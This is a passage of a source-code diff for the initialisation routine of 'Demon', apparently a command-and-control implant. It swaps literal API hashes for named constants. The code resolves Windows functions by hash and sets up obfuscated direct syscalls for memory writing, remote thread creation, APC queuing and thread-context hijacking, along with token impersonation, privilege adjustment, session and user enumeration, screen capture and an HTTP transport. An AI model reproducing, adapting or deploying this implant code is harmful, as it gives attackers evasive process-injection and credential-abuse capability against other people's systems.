Instance.Win32.InitializeProcThreadAttributeList = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_InitializeProcThreadAttributeList );
Instance.Win32.UpdateProcThreadAttribute = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_UpdateProcThreadAttribute );
Instance.Win32.SetCurrentDirectoryW = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_SetCurrentDirectoryW );
Instance.Win32.Wow64DisableWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Wow64DisableWow64FsRedirection );
Instance.Win32.Wow64RevertWow64FsRedirection = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_Wow64RevertWow64FsRedirection );
Instance.Win32.GetModuleHandleA = LdrFunctionAddr( Instance.Modules.Kernel32, FuncHash_GetModuleHandleA );
}
// Check if it's min win xp. no one uses win 95 and below (from Meterpreter)
@@ -392,33 +392,33 @@ VOID DemonInit( VOID )
HMODULE pNtdll = SyscallLdrNtdll();
DWORD SyscallCounter = SyscallsExtract( pNtdll, Syscalls );
Instance.Syscall.NtOpenProcess = SyscallsObf( Syscalls, SyscallCounter, 0x5003c058 );
Instance.Syscall.NtQueryInformationProcess = SyscallsObf( Syscalls, SyscallCounter, 0xd034fc62 );
Instance.Syscall.NtQuerySystemInformation = SyscallsObf( Syscalls, SyscallCounter, 0xee4f73a8 );
Instance.Syscall.NtAllocateVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x6793c34c );
Instance.Syscall.NtQueueApcThread = SyscallsObf( Syscalls, SyscallCounter, 0xd4612238 );
Instance.Syscall.NtOpenThread = SyscallsObf( Syscalls, SyscallCounter, 0xfb8a31d1 );
Instance.Syscall.NtResumeThread = SyscallsObf( Syscalls, SyscallCounter, 0x2c7b3d30 );
Instance.Syscall.NtSuspendThread = SyscallsObf( Syscalls, SyscallCounter, 0x50febd61 );
Instance.Syscall.NtCreateEvent = SyscallsObf( Syscalls, SyscallCounter, 0xca58747d );
Instance.Syscall.NtDuplicateObject = SyscallsObf( Syscalls, SyscallCounter, 0x2388ee19 );
Instance.Syscall.NtGetContextThread = SyscallsObf( Syscalls, SyscallCounter, 0x9e0e1a44 );
Instance.Syscall.NtSetContextThread = SyscallsObf( Syscalls, SyscallCounter, 0x308be0d0 );
Instance.Syscall.NtWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, 0x4c6dc63c );
Instance.Syscall.NtAlertResumeThread = SyscallsObf( Syscalls, SyscallCounter, 0x482e8408 );
Instance.Syscall.NtSignalAndWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, 0x7bdd15cd );
Instance.Syscall.NtTestAlert = SyscallsObf( Syscalls, SyscallCounter, 0x7915b7df );
Instance.Syscall.NtCreateThreadEx = SyscallsObf( Syscalls, SyscallCounter, 0xcb0c2130 );
Instance.Syscall.NtOpenProcessToken = SyscallsObf( Syscalls, SyscallCounter, 0x7bd07459 );
Instance.Syscall.NtDuplicateToken = SyscallsObf( Syscalls, SyscallCounter, 0x3000ecc3 );
Instance.Syscall.NtProtectVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x82962c8 );
Instance.Syscall.NtTerminateThread = SyscallsObf( Syscalls, SyscallCounter, 0xac3c9dc8 );
Instance.Syscall.NtWriteVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x95f3a792 );
Instance.Syscall.NtContinue = SyscallsObf( Syscalls, SyscallCounter, 0x780a612c );
Instance.Syscall.NtReadVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0xc24062e3 );
Instance.Syscall.NtFreeVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0x471aa7e9 );
Instance.Syscall.NtQueryVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, 0xe39d8e5d );
Instance.Syscall.NtQueryInformationToken = SyscallsObf( Syscalls, SyscallCounter, 0x2ce5a244 );
Instance.Syscall.NtOpenProcess = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenProcess );
Instance.Syscall.NtQueryInformationProcess = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryInformationProcess );
Instance.Syscall.NtQuerySystemInformation = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQuerySystemInformation );
Instance.Syscall.NtAllocateVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtAllocateVirtualMemory );
Instance.Syscall.NtQueueApcThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueueApcThread );
Instance.Syscall.NtOpenThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenThread );
Instance.Syscall.NtResumeThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtResumeThread );
Instance.Syscall.NtSuspendThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSuspendThread );
Instance.Syscall.NtCreateEvent = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtCreateEvent );
Instance.Syscall.NtDuplicateObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtDuplicateObject );
Instance.Syscall.NtGetContextThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtGetContextThread );
Instance.Syscall.NtSetContextThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSetContextThread );
Instance.Syscall.NtWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtWaitForSingleObject );
Instance.Syscall.NtAlertResumeThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtAlertResumeThread );
Instance.Syscall.NtSignalAndWaitForSingleObject = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtSignalAndWaitForSingleObject );
Instance.Syscall.NtTestAlert = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtTestAlert );
Instance.Syscall.NtCreateThreadEx = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtCreateThreadEx );
Instance.Syscall.NtOpenProcessToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtOpenProcessToken );
Instance.Syscall.NtDuplicateToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtDuplicateToken );
Instance.Syscall.NtProtectVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtProtectVirtualMemory );
Instance.Syscall.NtTerminateThread = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtTerminateThread );
Instance.Syscall.NtWriteVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtWriteVirtualMemory );
Instance.Syscall.NtContinue = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtContinue );
Instance.Syscall.NtReadVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtReadVirtualMemory );
Instance.Syscall.NtFreeVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtFreeVirtualMemory );
Instance.Syscall.NtQueryVirtualMemory = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryVirtualMemory );
Instance.Syscall.NtQueryInformationToken = SyscallsObf( Syscalls, SyscallCounter, FuncHash_NtQueryInformationToken );
MemSet( Syscalls, 0, sizeof( SYSCALL_STUB ) * MAX_NUMBER_OF_SYSCALLS );
Instance.Win32.LocalFree( Syscalls );
@@ -432,34 +432,34 @@ VOID DemonInit( VOID )
#endif
{
PUTS( "Using Native functions..." )
Instance.Syscall.NtOpenProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0x5003c058 );
Instance.Syscall.NtQueryInformationProcess = LdrFunctionAddr( Instance.Modules.Ntdll, 0xd034fc62 );
Instance.Syscall.NtQuerySystemInformation = LdrFunctionAddr( Instance.Modules.Ntdll, 0xee4f73a8 );
Instance.Syscall.NtAllocateVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x6793c34c );
Instance.Syscall.NtQueueApcThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xd4612238 );
Instance.Syscall.NtOpenThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xfb8a31d1 );
Instance.Syscall.NtResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2c7b3d30 );
Instance.Syscall.NtSuspendThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x50febd61 );
Instance.Syscall.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, 0xca58747d );
Instance.Syscall.NtDuplicateObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2388ee19 );
Instance.Syscall.NtGetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x9e0e1a44 );
Instance.Syscall.NtSetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x308be0d0 );
Instance.Syscall.NtWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x4c6dc63c );
Instance.Syscall.NtAlertResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0x482e8408 );
Instance.Syscall.NtSignalAndWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7bdd15cd );
Instance.Syscall.NtTestAlert = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7915b7df );
Instance.Syscall.NtCreateThreadEx = LdrFunctionAddr( Instance.Modules.Ntdll, 0xcb0c2130 );
Instance.Syscall.NtOpenProcessToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x7bd07459 );
Instance.Syscall.NtDuplicateToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x3000ecc3 );
Instance.Syscall.NtProtectVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x82962c8 );
Instance.Syscall.NtTerminateThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xac3c9dc8 );
Instance.Syscall.NtWriteVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x95f3a792 );
Instance.Syscall.NtContinue = LdrFunctionAddr( Instance.Modules.Ntdll, 0x780a612c );
Instance.Syscall.NtReadVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc24062e3 );
Instance.Syscall.NtFreeVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0x471aa7e9 );
Instance.Syscall.NtQueryVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, 0xe39d8e5d );
Instance.Syscall.NtQueryInformationToken = LdrFunctionAddr( Instance.Modules.Ntdll, 0x2ce5a244 );
Instance.Syscall.NtQueryInformationThread = LdrFunctionAddr( Instance.Modules.Ntdll, 0xc91f149b );
Instance.Syscall.NtOpenProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenProcess );
Instance.Syscall.NtQueryInformationProcess = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationProcess );
Instance.Syscall.NtQuerySystemInformation = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQuerySystemInformation );
Instance.Syscall.NtAllocateVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtAllocateVirtualMemory );
Instance.Syscall.NtQueueApcThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueueApcThread );
Instance.Syscall.NtOpenThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenThread );
Instance.Syscall.NtResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtResumeThread );
Instance.Syscall.NtSuspendThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSuspendThread );
Instance.Syscall.NtCreateEvent = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateEvent );
Instance.Syscall.NtDuplicateObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtDuplicateObject );
Instance.Syscall.NtGetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtGetContextThread );
Instance.Syscall.NtSetContextThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSetContextThread );
Instance.Syscall.NtWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtWaitForSingleObject );
Instance.Syscall.NtAlertResumeThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtAlertResumeThread );
Instance.Syscall.NtSignalAndWaitForSingleObject = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtSignalAndWaitForSingleObject );
Instance.Syscall.NtTestAlert = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtTestAlert );
Instance.Syscall.NtCreateThreadEx = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtCreateThreadEx );
Instance.Syscall.NtOpenProcessToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtOpenProcessToken );
Instance.Syscall.NtDuplicateToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtDuplicateToken );
Instance.Syscall.NtProtectVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtProtectVirtualMemory );
Instance.Syscall.NtTerminateThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtTerminateThread );
Instance.Syscall.NtWriteVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtWriteVirtualMemory );
Instance.Syscall.NtContinue = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtContinue );
Instance.Syscall.NtReadVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtReadVirtualMemory );
Instance.Syscall.NtFreeVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtFreeVirtualMemory );
Instance.Syscall.NtQueryVirtualMemory = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryVirtualMemory );
Instance.Syscall.NtQueryInformationToken = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationToken );
Instance.Syscall.NtQueryInformationThread = LdrFunctionAddr( Instance.Modules.Ntdll, FuncHash_NtQueryInformationThread );
}
ModuleName[ 0 ] = 'A';
@@ -631,86 +631,86 @@ VOID DemonInit( VOID )
if ( Instance.Modules.Advapi32 )
{
Instance.Win32.GetTokenInformation = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_GetTokenInformation );
Instance.Win32.CreateProcessWithTokenW = LdrFunctionAddr( Instance.Modules.Advapi32, 0x94e76e4c );
Instance.Win32.CreateProcessWithLogonW = LdrFunctionAddr( Instance.Modules.Advapi32, 0x823c224a );
Instance.Win32.CreateProcessWithTokenW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_CreateProcessWithTokenW );
Instance.Win32.CreateProcessWithLogonW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_CreateProcessWithLogonW );
Instance.Win32.RevertToSelf = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_RevertToSelf );
Instance.Win32.GetUserNameA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_GetUserNameA );
Instance.Win32.LogonUserA = LdrFunctionAddr( Instance.Modules.Advapi32, 0x609d56e4 );
Instance.Win32.LookupPrivilegeValueA = LdrFunctionAddr( Instance.Modules.Advapi32, 0xbbae6e84 );
Instance.Win32.LogonUserA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LogonUserA );
Instance.Win32.LookupPrivilegeValueA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupPrivilegeValueA );
Instance.Win32.LookupAccountSidA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupAccountSidA );
Instance.Win32.OpenThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, 579177116578842096 );
Instance.Win32.OpenProcessToken = LdrFunctionAddr( Instance.Modules.Advapi32, 0xc57bd097 );
Instance.Win32.ImpersonateLoggedOnUser = LdrFunctionAddr( Instance.Modules.Advapi32, 0xa6ffd55a );
Instance.Win32.AdjustTokenPrivileges = LdrFunctionAddr( Instance.Modules.Advapi32, 0xce4cd9cb );
Instance.Win32.LookupPrivilegeNameA = LdrFunctionAddr( Instance.Modules.Advapi32, 0xe6176fe8 );
Instance.Win32.SystemFunction032 = LdrFunctionAddr( Instance.Modules.Advapi32, 0xcccf3585 );
Instance.Win32.FreeSid = LdrFunctionAddr( Instance.Modules.Advapi32, 0x2174ce07 );
Instance.Win32.SetSecurityDescriptorSacl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x4a8307ab );
Instance.Win32.SetSecurityDescriptorDacl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x4a7acdfc );
Instance.Win32.InitializeSecurityDescriptor = LdrFunctionAddr( Instance.Modules.Advapi32, 0x70670cee );
Instance.Win32.AddMandatoryAce = LdrFunctionAddr( Instance.Modules.Advapi32, 0x248cc186 );
Instance.Win32.InitializeAcl = LdrFunctionAddr( Instance.Modules.Advapi32, 0x62cac4c7 );
Instance.Win32.AllocateAndInitializeSid = LdrFunctionAddr( Instance.Modules.Advapi32, 0x57a4ccf );
Instance.Win32.SetEntriesInAclW = LdrFunctionAddr( Instance.Modules.Advapi32, 0xe2d6b8e9 );
Instance.Win32.SetThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, 0x575b17ca );
Instance.Win32.OpenThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_OpenThreadToken );
Instance.Win32.OpenProcessToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_OpenProcessToken );
Instance.Win32.ImpersonateLoggedOnUser = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_ImpersonateLoggedOnUser );
Instance.Win32.AdjustTokenPrivileges = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AdjustTokenPrivileges );
Instance.Win32.LookupPrivilegeNameA = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_LookupPrivilegeNameA );
Instance.Win32.SystemFunction032 = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SystemFunction032 );
Instance.Win32.FreeSid = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_FreeSid );
Instance.Win32.SetSecurityDescriptorSacl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetSecurityDescriptorSacl );
Instance.Win32.SetSecurityDescriptorDacl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetSecurityDescriptorDacl );
Instance.Win32.InitializeSecurityDescriptor = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_InitializeSecurityDescriptor );
Instance.Win32.AddMandatoryAce = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AddMandatoryAce );
Instance.Win32.InitializeAcl = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_InitializeAcl );
Instance.Win32.AllocateAndInitializeSid = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_AllocateAndInitializeSid );
Instance.Win32.SetEntriesInAclW = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetEntriesInAclW );
Instance.Win32.SetThreadToken = LdrFunctionAddr( Instance.Modules.Advapi32, FuncHash_SetThreadToken );
PUTS( "Loaded Advapi32 functions" )
}
if ( Instance.Modules.Oleaut32 )
{
Instance.Win32.SafeArrayAccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, 2675336209888825647 );
Instance.Win32.SafeArrayUnaccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, 18329906161741280562 );
Instance.Win32.SafeArrayCreate = LdrFunctionAddr( Instance.Modules.Oleaut32, 3571287155138900375 );
Instance.Win32.SafeArrayPutElement = LdrFunctionAddr( Instance.Modules.Oleaut32, 2676058380407465830 );
Instance.Win32.SafeArrayCreateVector = LdrFunctionAddr( Instance.Modules.Oleaut32, 17426458116918762890 );
Instance.Win32.SafeArrayDestroy = LdrFunctionAddr( Instance.Modules.Oleaut32, 7172011678126394509 );
Instance.Win32.SysAllocString = LdrFunctionAddr( Instance.Modules.Oleaut32, 3847978704220612774 );
Instance.Win32.SafeArrayAccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayAccessData );
Instance.Win32.SafeArrayUnaccessData = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayUnaccessData );
Instance.Win32.SafeArrayCreate = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayCreate );
Instance.Win32.SafeArrayPutElement = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayPutElement );
Instance.Win32.SafeArrayCreateVector = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayCreateVector );
Instance.Win32.SafeArrayDestroy = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SafeArrayDestroy );
Instance.Win32.SysAllocString = LdrFunctionAddr( Instance.Modules.Oleaut32, FuncHash_SysAllocString );
PUTS( "Loaded Oleaut32 functions" )
}
if ( Instance.Modules.Shell32 )
{
Instance.Win32.CommandLineToArgvW = LdrFunctionAddr( Instance.Modules.Shell32, 0x8d607276 );
Instance.Win32.CommandLineToArgvW = LdrFunctionAddr( Instance.Modules.Shell32, FuncHash_CommandLineToArgvW );
PUTS( "Loaded Shell32 functions" )
}
if ( Instance.Modules.Msvcrt )
{
Instance.Win32.vsnprintf = LdrFunctionAddr( Instance.Modules.Msvcrt, 0xe61d840f );
Instance.Win32.vsnprintf = LdrFunctionAddr( Instance.Modules.Msvcrt, FuncHash_vsnprintf );
PUTS( "Loaded Msvcrt functions" )
}
if ( Instance.Modules.User32 )
{
Instance.Win32.ShowWindow = LdrFunctionAddr( Instance.Modules.User32, 8245429827274884638 );
Instance.Win32.GetSystemMetrics = LdrFunctionAddr( Instance.Modules.User32, 0xa988c1a1 );
Instance.Win32.GetDC = LdrFunctionAddr( Instance.Modules.User32, 0xd3d24ac );
Instance.Win32.ReleaseDC = LdrFunctionAddr( Instance.Modules.User32, 0xe43871cd );
Instance.Win32.ShowWindow = LdrFunctionAddr( Instance.Modules.User32, FuncHash_ShowWindow );
Instance.Win32.GetSystemMetrics = LdrFunctionAddr( Instance.Modules.User32, FuncHash_GetSystemMetrics );
Instance.Win32.GetDC = LdrFunctionAddr( Instance.Modules.User32, FuncHash_GetDC );
Instance.Win32.ReleaseDC = LdrFunctionAddr( Instance.Modules.User32, FuncHash_ReleaseDC );
PUTS( "Loaded User32 functions" )
}
if ( Instance.Modules.Gdi32 )
{
Instance.Win32.GetCurrentObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0xd41e47df );
Instance.Win32.GetObjectW = LdrFunctionAddr( Instance.Modules.Gdi32, 0x512b413 );
Instance.Win32.CreateCompatibleDC = LdrFunctionAddr( Instance.Modules.Gdi32, 0xa05cbae0 );
Instance.Win32.CreateDIBSection = LdrFunctionAddr( Instance.Modules.Gdi32, 0xfff5b73d );
Instance.Win32.SelectObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0x7cf4fd7c );
Instance.Win32.BitBlt = LdrFunctionAddr( Instance.Modules.Gdi32, 0xa9804e46 );
Instance.Win32.DeleteObject = LdrFunctionAddr( Instance.Modules.Gdi32, 0xcc68186f );
Instance.Win32.DeleteDC = LdrFunctionAddr( Instance.Modules.Gdi32, 0x9f3bef5f );
Instance.Win32.GetCurrentObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_GetCurrentObject );
Instance.Win32.GetObjectW = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_GetObjectW );
Instance.Win32.CreateCompatibleDC = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_CreateCompatibleDC );
Instance.Win32.CreateDIBSection = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_CreateDIBSection );
Instance.Win32.SelectObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_SelectObject );
Instance.Win32.BitBlt = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_BitBlt );
Instance.Win32.DeleteObject = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_DeleteObject );
Instance.Win32.DeleteDC = LdrFunctionAddr( Instance.Modules.Gdi32, FuncHash_DeleteDC );
PUTS( "Loaded Gdi32 functions" )
}
if ( Instance.Modules.KernelBase )
{
Instance.Win32.SetProcessValidCallTargets = LdrFunctionAddr( Instance.Modules.KernelBase, 0xbb6970d6 );
Instance.Win32.SetProcessValidCallTargets = LdrFunctionAddr( Instance.Modules.KernelBase, FuncHash_SetProcessValidCallTargets );
PUTS( "Loaded KernelBase functions" )
}
@@ -719,18 +719,18 @@ VOID DemonInit( VOID )
#ifdef TRANSPORT_HTTP
if ( Instance.Modules.WinHttp )
{
Instance.Win32.WinHttpOpen = LdrFunctionAddr( Instance.Modules.WinHttp, 0x5e4f39e5 );
Instance.Win32.WinHttpConnect = LdrFunctionAddr( Instance.Modules.WinHttp, 0x7242c17d );
Instance.Win32.WinHttpOpenRequest = LdrFunctionAddr( Instance.Modules.WinHttp, 0xeab7b9ce );
Instance.Win32.WinHttpSetOption = LdrFunctionAddr( Instance.Modules.WinHttp, 0xa18b94f8 );
Instance.Win32.WinHttpCloseHandle = LdrFunctionAddr( Instance.Modules.WinHttp, 0x36220cd5 );
Instance.Win32.WinHttpSendRequest = LdrFunctionAddr( Instance.Modules.WinHttp, 0xb183faa6 );
Instance.Win32.WinHttpAddRequestHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, 0xed7fcb41 );
Instance.Win32.WinHttpReceiveResponse = LdrFunctionAddr( Instance.Modules.WinHttp, 0x146c4925 );
Instance.Win32.WinHttpWebSocketCompleteUpgrade = LdrFunctionAddr( Instance.Modules.WinHttp, 0x58929db );
Instance.Win32.WinHttpQueryDataAvailable = LdrFunctionAddr( Instance.Modules.WinHttp, 0x34cb8684 );
Instance.Win32.WinHttpReadData = LdrFunctionAddr( Instance.Modules.WinHttp, 0x7195e4e9 );
Instance.Win32.WinHttpQueryHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, 0x389cefa5 );
Instance.Win32.WinHttpOpen = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpOpen );
Instance.Win32.WinHttpConnect = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpConnect );
Instance.Win32.WinHttpOpenRequest = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpOpenRequest );
Instance.Win32.WinHttpSetOption = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpSetOption );
Instance.Win32.WinHttpCloseHandle = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpCloseHandle );
Instance.Win32.WinHttpSendRequest = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpSendRequest );
Instance.Win32.WinHttpAddRequestHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpAddRequestHeaders );
Instance.Win32.WinHttpReceiveResponse = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpReceiveResponse );
Instance.Win32.WinHttpWebSocketCompleteUpgrade = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpWebSocketCompleteUpgrade );
Instance.Win32.WinHttpQueryDataAvailable = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpQueryDataAvailable );
Instance.Win32.WinHttpReadData = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpReadData );
Instance.Win32.WinHttpQueryHeaders = LdrFunctionAddr( Instance.Modules.WinHttp, FuncHash_WinHttpQueryHeaders );
PUTS( "Loaded WinHttp functions" )
}
@@ -738,40 +738,40 @@ VOID DemonInit( VOID )
if ( Instance.Modules.Mscoree )
{
Instance.Win32.CLRCreateInstance = LdrFunctionAddr( Instance.Modules.Mscoree, 10918823944048432655 );
Instance.Win32.CLRCreateInstance = LdrFunctionAddr( Instance.Modules.Mscoree, FuncHash_CLRCreateInstance );
}
if ( Instance.Modules.Iphlpapi )
{
Instance.Win32.GetAdaptersInfo = LdrFunctionAddr( Instance.Modules.Iphlpapi, 0xbc950fc5 );
Instance.Win32.GetAdaptersInfo = LdrFunctionAddr( Instance.Modules.Iphlpapi, FuncHash_GetAdaptersInfo );
}
if ( Instance.Modules.NetApi32 )
{
Instance.Win32.NetLocalGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x2c3fa6b9 );
Instance.Win32.NetGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xb278fc6e );
Instance.Win32.NetUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xe84c1c20 );
Instance.Win32.NetWkstaUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x3f45a8a );
Instance.Win32.NetSessionEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0x80edcd45 );
Instance.Win32.NetShareEnum = LdrFunctionAddr( Instance.Modules.NetApi32, 0xb0461db4 );
Instance.Win32.NetApiBufferFree = LdrFunctionAddr( Instance.Modules.NetApi32, 0x83e6be2 );
Instance.Win32.NetLocalGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetLocalGroupEnum );
Instance.Win32.NetGroupEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetGroupEnum );
Instance.Win32.NetUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetUserEnum );
Instance.Win32.NetWkstaUserEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetWkstaUserEnum );
Instance.Win32.NetSessionEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetSessionEnum );
Instance.Win32.NetShareEnum = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetShareEnum );
Instance.Win32.NetApiBufferFree = LdrFunctionAddr( Instance.Modules.NetApi32, FuncHash_NetApiBufferFree );
PUTS( "Loaded NetApi32 functions" )
}
if ( Instance.Modules.Ws2_32 )
{
